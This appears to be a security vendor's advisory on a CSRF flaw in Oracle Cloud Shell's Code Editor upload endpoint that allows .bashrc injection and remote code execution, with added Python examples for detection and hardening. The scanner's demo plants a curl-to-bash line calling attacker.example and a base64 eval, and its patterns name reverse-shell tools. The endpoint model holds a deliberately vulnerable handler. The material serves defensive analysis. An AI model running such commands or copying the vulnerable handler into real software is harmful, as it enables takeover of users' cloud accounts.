Remote Code Execution (RCE) Vulnerability in Oracle Cloud Infrastructure Code Editor: Cloud Takeover Risk

1. Critical Remote Code Execution (RCE) in OCI Code Editor

Tenable Research discovered a serious Remote Code Execution (RCE) vulnerability in Oracle Cloud Infrastructure’s (OCI) Code Editor. This flaw allowed attackers to silently compromise a victim’s Cloud Shell session via a single malicious link. Once exploited, the vulnerability could potentially allow lateral movement within OCI and compromise related development services.


2. Technical Details of the Vulnerability

  • The root cause is a Cross-Site Request Forgery (CSRF) weakness in the Code Editor's file upload mechanism.

  • The browser-based IDE shares its file system with Cloud Shell, so a file written through the Code Editor's upload endpoint lands in the victim's Cloud Shell home directory. That shared file system is the unexpected attack surface.

  • The /file-upload endpoint in Cloud Shell did not enforce CSRF protection: a POST carrying the session cookie was accepted regardless of which site had issued it.

  • The attack used a crafted cross-site HTTP POST to that endpoint.

  • In addition, the session cookie carried no SameSite attribute, so the browser attached it to requests initiated by other sites.

  • As a result, any website could upload arbitrary files into the victim's Cloud Shell environment as long as the victim was logged in to OCI in the same browser.


3. Attack Scenario

  • The attacker hosts a malicious web page and lures the victim to it (phishing e-mail, chat link, and so on).

  • When a logged-in OCI user visits the page, it silently sends a cross-site POST to the vulnerable endpoint, uploading a payload such as a modified .bashrc file into the victim's Cloud Shell home directory.

  • The next time the victim opens a Cloud Shell session, the shell sources the modified startup file and the injected commands run without any further user interaction.

  • This gives the attacker command execution in the victim's Cloud Shell environment, for example by starting a reverse shell.

  • Cloud Shell ships with the OCI CLI already authenticated as the logged-in user, so the injected commands can drive the CLI with that user's permissions and reach additional services. The attacker does not gain more rights than the victim has, but a privileged victim hands over a correspondingly privileged foothold.


4. Potential Indicators of Compromise (IOCs)

  • Unexpected modifications to shell initialization files: .bashrc, .bash_profile, .profile, .zshrc and similar, especially lines that download and execute content or decode embedded payloads.

  • Outbound connections from Cloud Shell to external IPs or domains that the user does not recognise.

  • OCI CLI invocations originating from Cloud Shell that the user did not run, visible in the shell history and in OCI Audit logs.

  • Files appearing in the Cloud Shell workspace that the user never uploaded.
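The following is an added detection example for the indicators above; it is not a Tenable or Oracle tool. It hashes the shell startup files in a home directory against a known-good baseline and flags lines that are rarely legitimate in a startup file (downloads piped into a shell, decoded payloads, bash network redirections, OCI CLI calls at shell start). The file list, the regular expressions, the baseline format and the sample file contents are all this example's own choices.

```python
import hashlib
import re
import tempfile
from pathlib import Path

# Startup files that a shell sources automatically; chosen for this example.
STARTUP_FILES = [".bashrc", ".bash_profile", ".profile", ".zshrc", ".bash_logout"]

# Patterns that are rarely legitimate in a startup file (example heuristics).
SUSPICIOUS = [
    (re.compile(r"\b(curl|wget)\b.*\|\s*(ba|z|da)?sh\b"), "download piped to a shell"),
    (re.compile(r"\bbase64\s+(-d|--decode)\b"), "base64-decoded payload"),
    (re.compile(r"/dev/tcp/"), "bash network redirection"),
    (re.compile(r"\bnc\b.*\s-e\s|\bncat\b.*--exec"), "netcat reverse shell"),
    (re.compile(r"\boci\s+(iam|identity|os|compute)\b"), "OCI CLI call at shell start"),
    (re.compile(r"\beval\b.*\$\("), "eval of command output"),
]


def sha256_file(path):
    """Hex SHA-256 of a file, used for the baseline comparison."""
    return hashlib.sha256(path.read_bytes()).hexdigest()


def scan_startup_files(home, baseline):
    """Return a list of findings for the startup files under `home`.

    `baseline` maps file name -> known-good sha256 recorded earlier; files that
    were never baselined are still pattern-scanned but not hash-compared.
    """
    findings = []
    for name in STARTUP_FILES:
        path = home / name
        if not path.exists():
            continue
        if name in baseline and baseline[name] != sha256_file(path):
            findings.append({"file": name, "line": 0,
                             "reason": "content differs from baseline", "text": ""})
        for lineno, line in enumerate(path.read_text(errors="replace").splitlines(), 1):
            stripped = line.strip()
            if not stripped or stripped.startswith("#"):
                continue  # blank lines and comments cannot execute anything
            for pattern, reason in SUSPICIOUS:
                if pattern.search(stripped):
                    findings.append({"file": name, "line": lineno,
                                     "reason": reason, "text": stripped})
    return findings


def demo_scan():
    """Build a constructed home directory, baseline it, then tamper with .bashrc
    the way an uploaded replacement file would, and scan it."""
    home = Path(tempfile.mkdtemp())
    clean_bashrc = ("# ~/.bashrc (constructed sample)\n"
                    "export PATH=\"$HOME/bin:$PATH\"\n"
                    "alias ll='ls -la'\n")
    (home / ".bashrc").write_text(clean_bashrc)
    (home / ".profile").write_text("# ~/.profile (constructed sample)\n"
                                   "[ -f ~/.bashrc ] && . ~/.bashrc\n")
    baseline = {n: sha256_file(home / n) for n in STARTUP_FILES if (home / n).exists()}
    # Constructed tampering: original content plus two injected lines.
    (home / ".bashrc").write_text(
        clean_bashrc
        + "curl -fsSL https://attacker.example/s | bash\n"
        + 'eval "$(echo aWQ= | base64 -d)"\n')
    return scan_startup_files(home, baseline)


if __name__ == "__main__":
    for finding in demo_scan():
        print(f"{finding['file']}:{finding['line']}: {finding['reason']}  {finding['text']}")
```

Running the module scans the constructed directory; to check a real Cloud Shell, call `scan_startup_files(Path.home(), baseline)` with a baseline recorded while the files were known to be clean. The baseline comparison is the stronger signal: the regular expressions only catch common patterns, and an attacker who controls the whole file can write something they do not match.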


5. Affected Services

The vulnerability affects not only Cloud Shell, but also any OCI services that rely on the same shared file system or on the developer tools configured within it, such as:

  • Resource Manager

  • Oracle Functions

  • Data Science Environments

These services could be tampered with post-compromise, allowing attackers to alter deployment configurations, inject malicious functions, or manipulate data workflows.


6. Mitigation

Oracle has issued a patch that enforces:

  • CSRF token validation via a custom request header (e.g., x-csrf-token) that the server checks against the user's session.

  • Browser-enforced cross-origin rules on the upload endpoint, so that cross-origin file uploads that are not explicitly authorized are refused.

The custom header is what makes the fix effective: an HTML form on another site cannot add one, and a cross-origin fetch or XMLHttpRequest that sets one triggers a CORS preflight that the upload endpoint does not approve for foreign origins. Together these changes prevent external sites from interacting with the endpoint unless authorized.
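To make the weakness described in sections 2 and 3 and the fix in this section concrete, here is an added example, not Oracle's code and not from Tenable's write-up. It models the upload endpoint twice: once as the article describes the pre-patch behaviour (cookie is the only credential) and once with the header-based CSRF check plus an Origin check, then feeds both the request a malicious page's auto-submitted form would produce and a legitimate same-origin request. The endpoint path and header name come from the article; the cookie name `oci_session`, the origins `cloud.example` and `attacker.example`, the session store and all function names are this example's assumptions. A small helper also classifies a Set-Cookie value by its SameSite attribute.

```python
import hmac
import secrets
from dataclasses import dataclass, field

# Assumed names for this illustration; not OCI's real cookie or origin.
SESSION_COOKIE = "oci_session"
APP_ORIGIN = "https://cloud.example"
CSRF_HEADER = "x-csrf-token"   # header name mentioned in the article
SESSIONS = {}                   # session id -> per-session CSRF token


@dataclass
class Request:
    method: str
    path: str
    headers: dict
    cookies: dict
    files: dict = field(default_factory=dict)

    def header(self, name):
        """Case-insensitive header lookup."""
        for k, v in self.headers.items():
            if k.lower() == name.lower():
                return v
        return None


def new_session():
    """Log a user in: issue a session id and bind a random CSRF token to it."""
    sid = secrets.token_urlsafe(16)
    SESSIONS[sid] = secrets.token_urlsafe(32)
    return sid


def vulnerable_file_upload(req):
    """Pre-patch logic as the article describes it: the session cookie is the
    only credential, and the browser attaches it to cross-site POSTs too."""
    if req.method != "POST" or req.path != "/file-upload":
        return 404, "not found"
    if req.cookies.get(SESSION_COOKIE) not in SESSIONS:
        return 401, "no session"
    return 200, "stored " + ",".join(sorted(req.files))


def hardened_file_upload(req):
    """Patched logic: a custom header must carry the session's CSRF token,
    and the Origin header is checked as defence in depth."""
    if req.method != "POST" or req.path != "/file-upload":
        return 404, "not found"
    sid = req.cookies.get(SESSION_COOKIE)
    if sid not in SESSIONS:
        return 401, "no session"
    # A cross-site HTML form cannot add custom headers, and a cross-origin
    # fetch()/XHR that sets one triggers a CORS preflight this origin never
    # approves for foreign sites, so this check alone stops the attack.
    token = req.header(CSRF_HEADER)
    if token is None or not hmac.compare_digest(token, SESSIONS[sid]):
        return 403, "missing or invalid CSRF token"
    # Browsers send Origin on every cross-origin POST; reject foreign ones.
    origin = req.header("Origin")
    if origin is not None and origin != APP_ORIGIN:
        return 403, "cross-origin request rejected"
    return 200, "stored " + ",".join(sorted(req.files))


def samesite_allows_cross_site_post(set_cookie):
    """True if a cookie issued with this Set-Cookie value can ride along on a
    cross-site POST. Lax and Strict block it; None allows it; a missing
    attribute leaves the decision to the browser's default instead of the
    server's policy, so it is treated as unsafe here."""
    attrs = {p.strip().lower() for p in set_cookie.split(";")[1:]}
    return not ("samesite=lax" in attrs or "samesite=strict" in attrs)


def attacker_page_request(sid):
    """What a malicious page's auto-submitted form produces: the browser adds
    the victim's cookie, but the page cannot set custom headers. The file
    content is a constructed placeholder."""
    return Request(
        method="POST", path="/file-upload",
        headers={"Origin": "https://attacker.example"},
        cookies={SESSION_COOKIE: sid},
        files={".bashrc": b"# injected startup command (constructed sample)\n"},
    )


def legitimate_request(sid):
    """The Code Editor's own upload: same origin, token header present."""
    return Request(
        method="POST", path="/file-upload",
        headers={"Origin": APP_ORIGIN, CSRF_HEADER: SESSIONS[sid]},
        cookies={SESSION_COOKIE: sid},
        files={"notes.txt": b"hello\n"},
    )


if __name__ == "__main__":
    sid = new_session()
    print("vulnerable, attacker page:", vulnerable_file_upload(attacker_page_request(sid)))
    print("hardened,   attacker page:", hardened_file_upload(attacker_page_request(sid)))
    print("hardened,   legitimate   :", hardened_file_upload(legitimate_request(sid)))
    print("cookie without SameSite  :", samesite_allows_cross_site_post("oci_session=abc; Secure"))
```

The order of checks in `hardened_file_upload` matters: the token is compared with `hmac.compare_digest` so that response timing does not leak it, and the Origin check is kept even though the header check is sufficient, because a second independent control is cheap and catches misconfigured CORS policies. Setting the session cookie with an explicit `SameSite=Lax` or `Strict` would be a third layer on top of the server-side checks.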


7. Recommendations

  • Regularly review file contents in Cloud Shell, especially the shell startup files, and keep a baseline to compare against.

  • Apply the principle of least privilege across all OCI services and identities, so that a compromised Cloud Shell session inherits as little as possible.

  • Monitor OCI Audit logs and shell command histories for abnormal activity, in particular OCI CLI calls the user did not make.

  • Educate users about phishing and malicious websites: in this case, visiting a page while logged in to OCI was enough, which is the delivery model of any CSRF-based attack.


Written by

FPT Metrodata Indonesia

PT FPT Metrodata Indonesia (FMI) is a joint venture between FPT IS and Metrodata Electronics, focusing on providing Cybersecurity-as-a-Service—including SOC, managed security, professional services, consulting, and threat intelligence—to support Indonesia’s rapidly growing digital economy. FMI is expanding into AI and cloud GPU services to deliver innovative protection and solutions for enterprises. Learn more at https://fmisec.com.